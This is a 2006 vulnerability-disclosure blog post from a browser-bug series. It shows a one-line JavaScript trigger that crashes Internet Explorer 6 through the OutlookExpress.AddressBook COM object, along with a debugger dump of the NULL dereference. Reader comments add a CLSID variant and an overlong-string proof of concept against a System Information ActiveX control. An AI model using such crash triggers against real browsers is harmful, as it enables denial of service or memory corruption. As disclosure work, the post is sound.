MoBB #3: OutlookExpress.AddressBook
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. It appears to have been resolved (via killbit) in a recent update to Window XP SP2. This bug is one of many that are triggered by loading a non-ActiveX COM object from inside Internet Explorer.
a = new ActiveXControl('OutlookExpress.AddressBook');
Demonstration
eax=00000000 ebx=06622008 ecx=00000002
edx=065814e4 esi=00000000 edi=00000000
eip=0648b2f5 esp=0012a734 ebp=0012a754
msoe!IDwGetOption+0x78:
0648b2f5 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference.
posted by hdm @ 11:27 PM
3 comments
links to this post
3 Comments:
Hello hdm,
This flaw is known since March 2005 (discovered by Shane Hird) :
http://www.securityfocus.com/archive/1/391803
You can replace "OutlookExpress.AddressBook" by its clsid "233A9694-667E-11d1-9DFB-006097D50408" :
[object classid="clsid:233A9694-667E-11d1-9DFB-006097D50408"][/object]
However, very good work :-)
Good to know, thanks for the comment! A quick search of the COM name (but not the CLSID) didn't turn this up. Looks like the killbit has finally been enabled.
Regards,
Nice finds with the Browser bugs. I came across this one while playing with System information ActiveX:
classid="clsid:273380E8-1438-4B2C-95B0-713284FBC302"
filemame = String(1, "A")
computer = String(1234, "BIG AND SCARY")
category = String(1, "A")
victim.SaveFile filename, computer, category
I can't paste html so here it is in full: http://noderat.spaces.msn.com/blog/cns!6ADE4614B66EADD2!1150.entry
regards
c0ntex
Post a Comment
Links to this post:
Create a Link
<< Home